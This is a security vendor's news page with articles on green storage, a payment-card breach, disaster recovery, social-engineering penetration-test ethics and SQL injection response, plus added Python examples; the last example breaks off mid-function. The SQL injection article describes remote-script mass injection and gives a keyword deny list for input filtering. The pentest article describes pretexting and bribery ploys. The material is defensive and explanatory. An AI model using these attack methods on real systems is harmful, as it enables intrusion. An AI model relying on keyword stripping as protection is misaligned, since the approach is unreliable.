Top 10 Storage Technologies for a Greener Network - January 25, 2009
Here are 10 technologies to improve storage efficiency and reduce power consumption.
An Environmental Protection Agency (EPA) report to Congress [1] compared the energy consumption of four primary data-center components: high-end servers, midrange servers, networking equipment, and storage devices (see Table). In this study, data storage devices had the highest power consumption growth rate (191%) and the highest overall power consumption (3.2 billion kWh).
According to the report, power consumption of data storage devices maintained a steady growth rate during the period (see figure, below). Left unchecked, this growth rate will soon encumber the power requirements of other data-center components.
Adding to the problem of rising power requirements in the data center is the fact that every watt of power consumed by IT equipment requires at least another watt for infrastructure, which includes cooling, UPS, lighting, and losses through power distribution. In other words, each watt saved in the data center is two watts earned!
In light of this, data storage vendors have been optimizing power efficiency through various design aspects of their products. The benefits of this are the following:
- Reduced storage power requirement “balances” the overall power consumption of IT equipment in the data center (i.e., provides more available power to the servers); and
- Reduced storage power requirements decrease the overall data-center power requirements, reducing operational costs.
“Green storage” is a simple way to describe data storage (or storage networking) products that can be configured for optimal energy efficiency and power savings. However, the components that constitute green storage, and the techniques for making storage “greener,” are still largely unknown or misunderstood.
This article summarizes several approaches to reducing storage power consumption, including high-efficiency power supplies, high-capacity disk drives, and often-overlooked space-saving software options.
High-efficiency power supplies
A large amount of data-center power is lost due to poorly designed power supplies with low efficiency ratings. According to recent studies, inefficient power supplies in data-center equipment contribute a power loss of 50% or more during periods of low power consumption.
Designing products with an efficient power profile involves two steps. First, a power supply's rated output specifications should be closely matched to the components that it powers. Second, power supplies should deliver optimal power efficiency across the entire product load range. Poorly designed IT products using overrated power supplies that continually operate within their lowest-efficiency load range needlessly drain power from the data center.
Today, high-efficiency power supplies are available in disk and tape systems, fabric switches and directors, and other storage network appliances. Deploying products designed for energy efficiency incrementally reduces the overall data-center power bill.
High-capacity disk drives
The latest storage systems use disk drives with the highest capacities in history. Using these high-capacity drives allows users to drive down watts/terabyte in the data center. For example, migrating data stored on legacy 36/73/146GB Fibre Channel drives to newer, higher-capacity Fibre Channel or Serial Attached SCSI (SAS) drives can significantly improve power/cooling profiles. Similarly, migrating infrequently accessed application data to high-capacity SATA tiers will substantially improve storage energy efficiency.
In high-performance applications, one drawback of high-capacity drives is reduced I/O throughput. “Wide striping” overcomes this by allowing high-performance applications to be spread across many (tens or even hundreds) more disks. Because wide striping allows many volumes to share a given drive, utilization is much higher. Therefore, application data can sustain a high number of IOPS with high-capacity drives, avoiding the necessity of low-capacity, high-rpm, energy-intensive drives.
Advanced RAID techniques
When high-capacity disk drives are used for storage devices, larger amounts of data are stored per drive. Therefore, care must be taken to ensure data reliability is not compromised. In the past, this protection was commonly addressed through RAID-1 mirroring. Today, space-efficient RAID implementations have become more commonplace, including single-parity RAID 5 and recent RAID-6 innovations such as dual parity and P+Q algorithms. When compared to data mirroring, these technologies offer up to 70% greater storage utilization, resulting in fewer power-consuming drives needed to provide protection against drive failures.
Thin provisioning
A key problem faced by storage administrators is storage quota allocation. How much physical storage space should be assigned for each application? Knowing that an overflowing data volume has many unpleasant side effects, administrators commonly overprovision their disk quotas. If they think an application will require a single terabyte, they might decide to allocate 2TB, “just in case,” to accommodate growth, or to adjust for a miscalculation of the storage space actually consumed by the application.
But what if the application does not grow as expected, or if the miscalculation was on the short side? The result is wasted space: space that cannot be used by any other application. By some estimates, 60% or more of disk storage remains unused simply because of this type of overprovisioning. Unused disk capacity, however, continues to draw power and contributes to the overall data-center electricity bill.
The problem of overprovisioning can be solved through thin provisioning, where administrators create “flexible” volumes that appear to the application to be a certain size but in reality are much smaller physically. Thin-provisioning technology provides substantial improvements in storage sizing. Data volumes can be resized quickly and dynamically as application requirements change.
The bottom-line impact of thin provisioning is a reduction in physically allocated storage, and direct savings in data-center power, heat, and cooling requirements.
Data de-duplication
The average disk volume contains thousands or even millions of duplicate data objects. As data objects are created, modified, distributed, backed up, and archived, duplicate data quickly begins to proliferate throughout the organization. The result is inefficient use of storage resources. Data de-duplication helps to prevent this inefficiency.
Typically, data de-duplication divides stored data objects into smaller blocks. Each block of data has a digital “signature,” which is compared to all other signatures in the data volume. If an exact block match exists, then the duplicate block is discarded and its disk space is reclaimed. De-duplication can be implemented across a wide variety of applications and file types, including primary data, backup data, and archival data. By implementing de-duplication, users can reclaim up to 95% of their storage space.
Note that combining thin provisioning and data de-duplication has an additive effect on the efficiency of storage. De-duplicated volumes are sometimes oversized when the de-duplication savings ratio proves to be greater than predicted. De-duplicated volumes are also sometimes oversized intentionally to account for some amount of growth. Thin provisioning eliminates this additional capacity overhead pre-allocated for de-duplication.
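The block-level de-duplication described above, as an added example that is not part of the original article: data objects are split into fixed-size blocks, each block gets a signature, and a block whose signature is already in the store is not written again. SHA-256 as the signature and 4 KB blocks are assumptions; the sample volumes are constructed. One defensive detail the article leaves out is that a signature match is verified byte-for-byte before space is reclaimed.

```python
import hashlib

BLOCK_SIZE = 4096  # fixed-size chunking, the simplest form of block-level dedup


def split_blocks(data: bytes, block_size: int = BLOCK_SIZE) -> list:
    """Divide a data object into fixed-size blocks (the last may be short)."""
    return [data[i:i + block_size] for i in range(0, len(data), block_size)]


def signature(block: bytes) -> str:
    """Digital 'signature' of a block: SHA-256 (assumed; the article names no hash)."""
    return hashlib.sha256(block).hexdigest()


class DedupStore:
    """Content-addressed block store keeping one physical copy per distinct block."""

    def __init__(self):
        self.blocks = {}    # signature -> the single physical copy of the block
        self.refcount = {}  # signature -> number of logical references to it
        self.volumes = {}   # volume name -> ordered list of block signatures

    def write(self, name: str, data: bytes) -> int:
        """Store a data object; return how many of its blocks were duplicates."""
        sigs, duplicates = [], 0
        for block in split_blocks(data):
            sig = signature(block)
            stored = self.blocks.get(sig)
            if stored is None:
                self.blocks[sig] = block          # first time this content is seen
            elif stored != block:
                # A signature match only counts as a duplicate if the bytes really
                # match; never reclaim space on hash equality alone.
                raise RuntimeError(f"signature collision on block {sig[:12]}")
            else:
                duplicates += 1                   # duplicate: its space is reclaimed
            self.refcount[sig] = self.refcount.get(sig, 0) + 1
            sigs.append(sig)
        self.volumes[name] = sigs
        return duplicates

    def read(self, name: str) -> bytes:
        """Reassemble a data object from its block signatures."""
        return b"".join(self.blocks[sig] for sig in self.volumes[name])

    def logical_bytes(self) -> int:
        """Space the data would occupy without de-duplication."""
        return sum(len(self.blocks[s]) for sigs in self.volumes.values() for s in sigs)

    def physical_bytes(self) -> int:
        """Space actually consumed by the unique blocks."""
        return sum(len(b) for b in self.blocks.values())

    def reclaimed_fraction(self) -> float:
        """Share of logical capacity reclaimed by de-duplication."""
        logical = self.logical_bytes()
        return 0.0 if logical == 0 else 1 - self.physical_bytes() / logical


def build_demo_store() -> DedupStore:
    """Constructed sample: a primary copy, an identical backup, and an edited archive copy."""
    primary = b"".join(bytes([i]) * BLOCK_SIZE for i in range(16))  # 16 distinct blocks
    backup = primary                                                  # byte-identical backup
    archive = bytearray(primary)
    archive[3 * BLOCK_SIZE:4 * BLOCK_SIZE] = b"\xff" * BLOCK_SIZE    # exactly one block changed
    store = DedupStore()
    store.write("primary", primary)
    store.write("backup", backup)
    store.write("archive", bytes(archive))
    return store


if __name__ == "__main__":
    s = build_demo_store()
    print(f"logical {s.logical_bytes()} B, physical {s.physical_bytes()} B, "
          f"reclaimed {s.reclaimed_fraction():.1%}")
```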
Writable snapshots
Storage administrators must often allocate substantial storage space for enterprise test operations, such as application release rollouts and bug fix testing. In addition, organizations that rely on large-scale simulations for comprehensive testing, analysis, and modeling can incur large costs associated with providing additional storage space for these tests.
In the past, to address this issue, administrators would simply make complete copies of a data set as their “test set.” By offering writable snapshots, vendors provide application “clone” functionality where application copies can be created as temporary, writable copies. Furthermore, these copies can be created instantly, with minimal storage requirements.
This is accomplished by creating a writable “snapshot” of the primary dataset and storing only the data changes between a parent volume and a clone. All unchanged data remains on primary storage and is used by both the primary application and the secondary clone copy. Multiple snapshot copies can be created from a single primary dataset, enabling users to perform multiple test and development simulations and compare the characteristics of each dataset after the testing is complete.
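The copy-on-write mechanism behind writable snapshots, as an added example that is not part of the original article: each clone keeps only the blocks it has changed and reads everything else from the shared, unmodified parent. The class names, 4 KB block size and the two-clone test scenario are constructed for illustration.

```python
class ParentVolume:
    """Read-only primary dataset, addressed by block index."""

    def __init__(self, blocks):
        self.blocks = list(blocks)

    def read(self, index: int) -> bytes:
        return self.blocks[index]

    def physical_bytes(self) -> int:
        return sum(len(b) for b in self.blocks)


class WritableSnapshot:
    """A clone that stores only the blocks changed relative to its parent."""

    def __init__(self, parent: ParentVolume):
        self.parent = parent
        self.delta = {}  # block index -> private copy written by this clone

    def read(self, index: int) -> bytes:
        # Changed blocks come from the clone's own delta; everything else falls
        # through to the shared parent, which is never modified by any clone.
        return self.delta.get(index, self.parent.read(index))

    def write(self, index: int, data: bytes) -> None:
        if not 0 <= index < len(self.parent.blocks):
            raise IndexError("write outside the parent's block range")
        self.delta[index] = data  # first write to a block allocates its private copy

    def private_bytes(self) -> int:
        """Space this clone consumes beyond the shared parent."""
        return sum(len(b) for b in self.delta.values())

    def changed_blocks(self) -> list:
        return sorted(self.delta)


def run_test_scenario() -> dict:
    """Constructed example: two test clones of one 8-block primary dataset."""
    block = 4096
    primary = ParentVolume(bytes([i]) * block for i in range(8))
    clone_a = WritableSnapshot(primary)   # e.g. a release-rollout test copy
    clone_b = WritableSnapshot(primary)   # e.g. a bug-fix test copy
    clone_a.write(2, b"A" * block)
    clone_b.write(5, b"B" * block)
    clone_b.write(6, b"B" * block)
    with_snapshots = (primary.physical_bytes()
                      + clone_a.private_bytes() + clone_b.private_bytes())
    full_copies = 3 * primary.physical_bytes()  # what two complete copies would cost
    return {"primary": primary, "clone_a": clone_a, "clone_b": clone_b,
            "with_snapshots": with_snapshots, "full_copies": full_copies}


if __name__ == "__main__":
    r = run_test_scenario()
    print(f"snapshots: {r['with_snapshots']} B vs full copies: {r['full_copies']} B")
```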
Data compression
Used for decades in tape drives and home computers, data compression has recently appeared in data centers in two specific areas:
- External data compression appliances that compress data “on-the-fly” as data is stored on storage systems; and
- Disk-to-disk (D2D) backup devices, such as virtual tape libraries (VTLs), which use data compression to reduce the amount of storage required by backup copies.
These appliances are generally based on the Lempel-Ziv compression algorithm and can offer 50% or greater storage savings.
Flash drives
Solid-state flash drives use flash memory to store and access data. Because there are no mechanical components in flash drives, they provide faster response times and consume 38% less energy on average vs. traditional mechanical disk drives, resulting in a significant power consumption reduction in a transaction-per-second comparison. When deployed in combination with hard disk drives, flash drives provide an ultra-high-performance “tier” of storage for transaction application environments requiring optimal performance, while leveraging hard drive-based tiers for less demanding applications. Solid-state flash drives offer the ability to achieve high performance without sacrificing energy costs.
Standby and spin-down modes
Just as tape media uses no energy when it is not being accessed, if one is able to spin down unused or underutilized disk drives, noticeable power savings can be seen. Technologies such as MAID (massive array of idle disks) are now available, and potential future developments in intelligent controllers will allow disk drives to enter a series of reduced power states. Although spinning down a disk drive has a positive benefit on energy consumption, there is a likewise obvious impact to data retrieval response times.
Another technology advocated by some vendors is standby mode for the entire storage system. The idea is that during off-peak hours, disk controllers that are not being accessed could go into “sleep” mode to save even more energy. This is similar to modes currently used by PCs; the microprocessors in most storage systems have the identical capability. A standby mode invoked, say, between midnight and 6 AM would represent a 25% daily power savings.
Virtualization
By virtualizing servers, several “guest” servers can operate on a single physical server, reducing the overall number of servers in the data center and their associated power consumption. Virtualization technologies can also be applied to disk-based storage systems to reduce the amount of physical storage needed, and hence reduce the overall power consumption. Though in many ways thin provisioning provides virtualization, it can also extend beyond this technology.
By abstracting storage elements, the administrator is able to allocate physical resources that match the current usage needs, associating a virtual resource with high-performance storage or with more energy-efficient storage. Besides allowing for dynamic changes in virtual as well as physical volume sizes, virtualization can allow the transparent migration of application data between different classes of storage. For example, a project might initially be deployed on high-performance Fibre Channel drives; then, as the project finishes its peak usage and moves into a maintenance phase, the data can be transparently migrated to a more energy-efficient storage subsystem to take advantage of the better watts/gigabyte ratio of higher-capacity drives.
In this way, overall energy needs can be reduced, but more importantly can be appropriately assigned to the correct power/performance storage transparently to the application. This transparent placement of data can be extended with copy services mentioned above to allow administrators to custom-fit an application’s needs to the available storage resources.
Summary
Energy consumption continues to be one of the most significant portions of the cost of operating a data center. Finding ways to increase energy efficiency is of critical importance to data-center managers and has become a significant public policy issue. Using the technologies described in this article, you can take significant steps toward reducing data-storage power consumption, leading to a “greener” data center.
For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/consolidation-assess.php
About Us
Sencilo Solutions is a Florida-based integrator specializing in Cost Cutting storage, security and managed services solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, Data Domain, EMC, Hitachi, Symantec, HDS, IBM, Commvault, Xiotech and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, storage virtualization installation, maintenance and knowledge transfer.
Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, Tampa, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Clearwater, Kissimmee, Lakeland, Maitland and Cape Canaveral.
Data Breach Disclosed - 100 Million Credit Cards Compromised - January 20, 2009
Orlando Florida -- A data breach disclosed today by Heartland Payment Systems may well displace TJX Companies' January 2007 breach in the record books as the largest ever involving payment data with potentially over 100 million cards being compromised.
Heartland, a Florida-based provider of credit and debit card processing services said that unknown intruders had broken into its systems sometime last year and planted malicious software to steal card data carried on the company's networks. The company, which is among the largest payment processors in the country, claimed to have discovered the intrusion only last week after being alerted by Visa and MasterCard of suspicious activity.
The card companies' alerts triggered a subsequent investigation by "several forensic investigators" during which the intrusion was discovered, Robert Baldwin Jr., Heartland's president and CFO, said in the statement. The company said the intrusion may have been the result of a "widespread global cyberfraud operation".
Heartland claimed that no merchant data, cardholder's Social Security numbers, or unencrypted personal identification numbers (PIN), addresses or telephone numbers were compromised.
As with most data breach notifications, Heartland offered no explanations on when it was first informed of the breach by the card companies, when in 2008 the company had been breached, how long the intruders had remained undetected, or how many cards might have been compromised in the intrusion. A company spokeswoman did not immediately respond to requests for comment.
But given that Heartland processes more than 100 million card transactions per month, it is very possible that the number of compromised credit and debit cards is at least that much, if not more, said Avivah Litan, an analyst with Gartner Inc. "It does look like the biggest ever," Litan said. The TJX breach involved the compromise of over 45 million cards.
It also appears that those behind the breach "made off with the gold" by intercepting and stealing the so-called Track 2 data from the magnetic stripe on the back of cards, which is all that's needed to create counterfeit cards, Litan said.
Dan Clements, president of CardCops, an identity protection service of Affinion Group Inc., said that he has noticed activity in underground chat rooms that suggested a major compromise at a processor such as Heartland.
Typically when a card is stolen, crooks first check to see if the card is still active by using it for some transaction -- often a very small donation to a charitable organization -- to see if it works. This sort of validity check has increased by nearly 20% over the past few months, suggesting a major compromise. But it's not clear yet if it is related to the Heartland breach, Clements said.
The Heartland compromise is the second involving a large payment processor over the past few weeks. On Dec. 23, RBS WorldPay, the payment processing division of The Royal Bank of Scotland Group, announced that its systems had been breached by unknown intruders, resulting in the compromise of personal information belonging to about 1.5 million card holders. The compromised information included the Social Security numbers of 1.1 million individuals using payroll cards, the company said.
The incidents suggest that cybercrooks are increasingly beginning to target payment processors, Litan said. "Attacking a processor is much more serious than attacking a retailer. A processor sits at the nerve center of the payment process," and processes far more payment card data than any retailer, she said.
"More radical security moves" need to be taken by the payments industry as a whole to address the problem, she added. Such incidents show that the security requirements of the Payment Card Industry Data Security Standard (PCI DSS) being pushed by the major card companies are clearly not enough, Litan added.
For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/services-penetration.php
Disaster Recovery Planning Starts Before the Disaster - December 19, 2008
Tampa Florida -- The corporate headquarters building for OSI Restaurant Partners is a mere 800 feet from the end of a runway at Tampa International Airport. But according to OSI Chief Information Officer Dusty Williams, that's the least of their concerns.
OSI, the company that owns popular restaurant-chain brands such as Outback Steakhouse, Roy's and Carrabba's Italian Grill, is smack dab in the eye of the storm zone, in hurricane country. Their 750-person operation in Tampa includes all back office functions, including the financial, legal and real estate divisions. If a hurricane strikes and the building is impacted, the amount of sensitive data that is at stake is immeasurable.
"We're in an A zone as far as flooding is concerned. You don't really want your data center here."
The 2008 Atlantic hurricane season produced a record number of consecutive storms, according to the National Oceanic and Atmospheric Administration. The season saw a total of 16 named storms. With water temperatures rising due to climate change, many meteorological experts predict even tougher seasons to come. For companies in a hurricane zone, business continuity and disaster recovery preps need to be in place now, and not when the storm clouds begin churning.
It is that kind of thinking that inspired Williams to find a new home for the data center. In 2003, the main data center in headquarters had no backup power, and a business continuity/disaster recovery plan was a vague notion. Williams got initial approval to move OSI's data center to an off-site facility hosted by backup and storage service provider Qwest.
"Typically when we talk BC/DR, it's always around hurricanes. The plan was to move the data center locally to a Qwest facility," said Williams. "The building itself is a category 3 or 4 that is built to sustain hurricane damage and has backup and battery power that we don't have in the headquarters facility."
Within months, the plan was put to the test. Florida experienced a severe hurricane season in 2004. Williams said Hurricane Charley illuminated the fact that they had made the right decision to move data off-site.
"On a Thursday night at 5 o'clock, officials told us they would be shutting power down to the grid we are on. So, if we had not outsourced the data center, we would have been dead in the water. "
Williams said the entire summer of '04 was spent preparing for hurricanes. At least four blew through the area of varying intensity. While no major damage was sustained, when the season was over, it became clear that the BC/DR plan needed to include more than just one off-site data facility. OSI now has a second cyber center in Chicago that includes all critical systems. The company has more than 1200 restaurants around the country. The Chicago center would allow OSI and its restaurants to have operations back up and running within a few hours if the Florida off-site facility went down, according to Williams' estimate.
OSI's BC/DR plan is tested regularly to ensure connectivity to restaurants is maintained. Williams says he tests by bringing the main data center down and bringing the Chicago facility online.
Outsourcing the data center is crucial to any business with a natural disaster risk, according to Iain Hardcastle, senior consultant with professional services firm Deloitte & Touche at their operations in Bermuda. On the small island where his company operates, there is only one power supply. The local office, which stores all data on a SAN, also replicates the information at a local data hosting center.
"The accounting side of our business is managing trust funds and looking after accounts for many name-plate companies. They can be absolutely multimillion-dollar, global clients. They don't care if we have a bit of a weather problem down here."
"Buns on seats" preparations
The data is only one part of the picture when it comes to business continuity in a natural disaster-prone area. If a facility goes down because of power failure or flooding, many organizations need a physical location to place their staff so operations can continue. Deloitte has what Hardcastle refers to as a "buns on seats" office off-island. So, too, does OSI. OSI maintains a comprehensive facility in Atlanta, which they have had to use at least twice in the last 4 years.
"Once we declare a disaster, we have 50 cubes available there," said Williams. "But we have to go up and make sure everything is up and running and ready. So we have people, from an IT perspective, head up 72 hours out ahead of any storm in private aircrafts to make sure everything is ready to go."
Sometimes it isn't just humans that need to be relocated. One year, according to Williams, OSI tried to send a check printer up in a plane so vendor checks could continue to be cut. Unfortunately, the machine didn't fit through the door of the aircraft. The check printer was delivered to Atlanta by van instead.
The process of relocating people, and sometimes equipment, is time consuming, labor intensive and costly. The company even has contracting companies on standby for employees that may need assistance with boarding up houses before they depart. As complicated as it all sounds, Williams says, thankfully, most of it can be planned.
"With hurricanes, you have a distinct advantage over an earthquake or a tornado. You really don't know when they will strike."
Can you ever be completely prepared?
Even the most comprehensive BC/DR plan isn't without some risk, according to Hardcastle, who calls the Sencilo Solutions BC/DR plan a "continuously evolving process."
Williams admits he is still troubled at the prospect of keeping track of personnel in a worst case scenario.
"I don't worry as much about the technical side of it as I do the operations/people side of it. How do you find people?" he said.
OSI says disaster plans are also considered regionally for all of its 1200-plus restaurants, and each has special numbers set up so people can dial in and alert the company as to where they are.
"But you worry about how long that will take if cell service, phone service, is down," said Williams.
And despite the plans put in place at the headquarters building, there will still inevitably be some loss if the facility itself is damaged in high winds or flood waters, said Williams.
"Sometimes people have paper on their desk that they haven't put into a system yet. In those cases you need to ensure you have connections with vendors to ask them, 'How can we get your invoice back in here and get you paid?'"
For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/back-up-restore.php
Penetration Testing and Best Practices - September 16, 2008
Orlando Florida -- Penetration testing is an important means of assessing the strength of an organization’s information security program. A security system may look good from the inside, but a test is an excellent way to determine if it will hold up under pressure. These tests can range from simple port scans to all-out hacking attacks. However, since security depends on people, not just on technology, social engineering is one possible tool for use in penetration tests. Deception is a common means of breaching a security system, and a social engineering test can ascertain the strength of policies and how well employees follow those policies.
"However, the use of social engineering in penetration tests raises ethical issues because humans are being used for research purposes," says Brian McCarthy, CEO and well-known security professional at Sencilo Solutions in Lake Mary, Florida. Abuses such as Nazi experiments on prisoners and the Tuskegee Syphilis Study have led to a body of widely accepted guidelines for the ethical use of human subjects in research. I will draw upon human research principles and a few sample cases to identify ethical guidelines for the use of social engineering in penetration testing.
Cases
Piggybacking: A security consultant wearing a suit and tie, and carrying a briefcase, stands at the front entrance to a corporation. He waits for an employee to unlock the door with her ID scan and follows her in.
Shoulder Surfing: A security consultant notices employees standing outside a door smoking on their break. He walks over and mills about looking over his shoulder as employees enter the keypad code to reenter the building. With that information he lets himself in.
Computer Technician: Two security consultants walk into an office wearing “Computer Doctors” jumpsuits. They tell the administrative assistant that they have an order to fix the system. The assistant says, “Mr. Smith did not tell me about this, and he’s on vacation today and can’t be reached.” They reply, “We’re booked for the next two weeks. The system is overheating and could melt down at any moment. If it burns up because we were not allowed to work on it, somebody’s going to get fired. Are you sure you didn’t forget the order?” The assistant nervously lets them in.
Bribery: A security consultant posing as a representative of another company approaches an employee outside of work and offers him $50,000 to get some memos concerning the company’s plans for a new product.
The cases described above have been deliberately ordered from least to most ethically troubling. I would argue that there are morally relevant differences between the shoulder-surfing and piggybacking cases on one hand, and the computer technician and bribery cases on the other. For one, the latter two penetration-testing cases expose the employee being tested to significant psychological stress. The employee in the computer technician example is worried about losing his job, while the one in the bribery example is faced with an offer to do something illegal.
Moreover, the deception in the latter two cases is established by verbal manipulation. Why is this relevant? After all, all cases involve some level of misrepresentation, and we can just as easily misrepresent ourselves with our appearance and actions as we can with our words.
The difference is that when the deception is established verbally, the deceiver is plugging into deep-seated psychological triggers humans use to establish trust with others. Con men are good at playing on these triggers, and while people can be expected to follow procedures, they cannot be expected to resist the kind of psychological manipulation employed by a skilled manipulator. We would say the same thing of an attractive consultant soliciting an executive to see if he would exchange sex for secrets. The enticement is unfair. Moreover, the episode will undermine the employee’s trust in the company.
There is also the question of the professionalism on the part of the consultant when he moves from providing security advice to acting. Once the deceiver starts the charade, he will not know how much acting will be needed to get the employee’s cooperation. At some point the question becomes whether the consultant is measuring the strength of the company’s security policies, or his own acting skills. The consultant has put himself or herself into a compromising situation that could undermine faith in the profession as a whole.
Finally, what is the employer going to do with the employee in the bribery case if he agrees? The employer cannot trust the employee anymore, yet if he fires the employee, he can be accused of entrapment.
The first and most obvious warning is that penetration testing in general is pointless unless the organization has implemented the best available security measures it can manage. Why bother testing security if even a simple vulnerability analysis or common-sense assessment shows gaping holes? A penetration test of obviously flawed security is a waste of time and money.
In a Network World column published in 2000, I pointed out that deception techniques should be used only with a great deal of preparation of the staff. When preparing for a penetration test that involves social engineering, everyone in the organization should be thoroughly trained to understand the techniques of social engineering before beginning the tests.
The key points were as follows (from my article):
* The entire organization can prepare for social engineering simulations as a team; no one is subjected to attempted deception without knowing that the experience was part of a training and awareness exercise.
* Even if someone falls for a trick, the emotional effect is far less than if the same error occurred without preparation.
I think that preparing staff for the onslaught of skilled social engineers has many benefits. We can frame the exercises as a form of game or contest: who will be the best at spotting the confidence tricksters? Who will be quickest to foil their nefarious plans?
Role-playing games are an excellent way of changing beliefs, attitudes and behavior: having staff members take up the roles of social engineer and defender - and then reversing roles - is not only amusing, but it also has a long-term effect on people’s perceptions. It’s much easier to remember a social interaction we’ve experienced personally than to pay attention to abstract words. We can even turn the event into an opportunity for a good deal of fun and laughter, making security and secure behavior a positive experience instead of the usual drudgery.
Moreover, in addition to risk avoidance (reducing the likelihood of hurt feelings, frustration and anger), solid preparation can result in increased vigilance at all times. Once staff members are sensitized to the social engineering tricks they’ve experienced in role-playing games, they are more likely to recognize them in strangers. Having practiced alerting the security team to apprehended breaches, they will find it easier to take the initiative later when they spot real breaches.
For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/services-penetration.php
About Us
Sencilo Solutions is a Florida-based integrator specializing in network storage and information security solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, EMC, NetApp, Juniper Networks, Hitachi, Symantec, Barracuda Networks, and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, installation, maintenance and knowledge transfer.
Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Kissimmee, Lakeland, Maitland, Cape Canaveral, Lake Mary
How to deal with SQL Injection Attacks - August 17, 2008
Orlando Florida -- It’s not like SQL injection attacks are new. They go back to at least late 2004, when they appeared in Europe and Asia. A German TV station was attacked, then a Taiwanese security magazine. In 2006, Russian hackers broke into a Rhode Island government website and stole credit card data.
The attacks were proliferating. In 2007, a hacker defaced the Microsoft UK web site. Later that year, the UN website was defaced with a SQL injection attack. Have they no shame?
In January 2008, tens of thousands of websites were defaced by automated SQL injection attacks that exploited vulnerabilities in sites running Microsoft SQL Server.
In April 2008, the social security numbers of the sex offenders on the Sexual Offender Registry of Oklahoma were stolen by an injection attack.
In May 2008, a server farm in China used automated queries to Google’s search engine to identify SQL server websites that were vulnerable.
In July 2008, the Malaysian site for Kaspersky, a Russian computer security company, was hacked using a SQL injection.
From April 2008 to the present, there have been increasing SQL injection attacks exploiting the SQL injection vulnerability of Microsoft Internet Information Services and SQL server.
HOW THE INJECTION ATTACK WORKS
These attacks don’t require the hacker to have access to the server or, for that matter, the names of database fields. The attack hits all text fields in all tables with a single crafted SQL request, appending an HTML string to each field that loads a malicious JavaScript file from a remote location. When that value is later displayed to a user of the hacked site, the script tries to gain control over the user’s system.
A Barracuda Web Site Firewall protects Web applications and Web services from such attacks, and can also increase the performance and scalability of these applications. The Barracuda Web Site Firewall offers every capability needed to deliver, secure and manage enterprise Web applications from a single appliance through an intuitive, real-time user interface.
The number of exploited web pages is estimated at 500,000 so far, and growing daily. These attacks are across the board, against government sites as well as commercial sites, and against open-source SQL databases as well as Microsoft SQL Server. The attacking mechanisms can be manual or by automated spiders or by modified versions of popular software such as QuickTime and RealPlayer.
SQL is a rich and complex language, so there are many techniques by which the attack can be accomplished. The common approach is for the hacker to modify a variable being passed from the user’s browser URL address line or from a form on the browser into a SQL query string which is then processed on the website.
With this approach, hackers or their automated spiders can inject malicious instructions into the SQL commands written for the site, and these can do any number of awful things, like stealing all the data from the SQL database, destroying the database altogether, or modifying the records by adding references to remote malware that spreads the attack through innocent visitors using the site, in a kind of Trojan horse virus.
HOW DO YOU KNOW YOU’VE BEEN HIT
Don’t think you’re somehow exempt. If you’re using SQL in any form you’re vulnerable. Most websites are data driven these days, and most of those use SQL in one form or another. The hackers and their spiders may very well attack your site at any time.
It goes without saying you need to back up your SQL database, all of it, every day and keep those backups for perhaps a longer period of time than before. If you have 10 days of backup but you don’t watch your site and 10 days go by, you won’t have a useable backup and you’ll be SOL.
How do you know you’ve been attacked? "Well, the data on your screen is truncated and you get strange characters like hanging apostrophes and angle brackets on your screen where database information ought to be. Sometimes you get wise guy jokes there too. Don’t click on what appear to be links - that’ll get you in more trouble and infect your machine too," says Brian McCarthy, President of Sencilo Solutions, a security VAR in Central Florida.
HOW TO DEAL WITH THEM
If you’ve been attacked, you need to go to Internet Information Services (IIS) on your server and cut user connections, and stop the site. Then you need to find a good backup file to restore your database. For that, you need to figure out when the attack happened so you can use a backup from before it happened. "If you don’t have a good backup, you’ll probably have to clean the database manually to recover the data for your site," says McCarthy.
That means stripping out all the bad values and references that were injected. You have to painstakingly go through every field, record and table. In a big database, this can take forever, and it’s tedious and gut-wrenching work. Worse, it may not be a complete solution. The injection values are usually injected at the end of the existing values in the field, but if the injection values are longer than the field, they may write over the existing values, and that means the original data is lost.
When you’re done, turn IIS back on and see if you’ve done a good job, and whether there is some other gift they left for you. You don’t know until you bring the site up again and watch it work.
There are some scripts out there that say they can reverse the attack and clean the injected values out of your database. Here’s an example:
http://hackademix.net/2008/04/26/mass-attack-faq/#webdev
Different hackers inject different values, so there’s no guarantee that this will work.
Even assuming you can restore your database, you could have another attack any time with similar result. So if you have a good backup file of your database, make a protected copy of it for future use if necessary.
CLOSING THE VULNERABILITIES
Beyond that, you or your web designers need to close the vulnerabilities. You can do that in a variety of ways, all of which involve new coding. Go slowly and carefully, file by file, so you do it right and don’t miss anything.
When you recode, you need to write routines to clean all the parameters that are being fed into your SQL queries. To do this, you need to strip out any questionable SQL commands that could be part of an injection attack, including DECLARE, SELECT, SET, CAST, DROP, EXEC, ";", "--", INSERT, DELETE, XP_, VARCHAR and CHAR, among others.
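As an added example (not code from this article, from Sencilo, or from any product it mentions), the Python below runs against an in-memory SQLite database and shows the three things this section describes: a query built by string concatenation beside its parameterized form, a stand-in for the mass injection that appends a script tag to every text field of every table, and a scan-and-clean pass over all text columns of the kind the manual recovery above requires. The table and column names, the probe string and the `malware.example` URL are constructed for the demo. Parameter binding is shown beside the vulnerable query because a bound value is never parsed as SQL, so no list of keywords has to be guessed and stripped.

```python
import re
import sqlite3

# Anything that looks like an injected <script ...>...</script> tail.
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)


def make_db():
    """Constructed sample schema standing in for a data-driven site (not the article's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, descr TEXT)")
    conn.executemany(
        "INSERT INTO products (name, descr) VALUES (?, ?)",
        [("Widget", "A plain widget"), ("Gadget", "A handy gadget")],
    )
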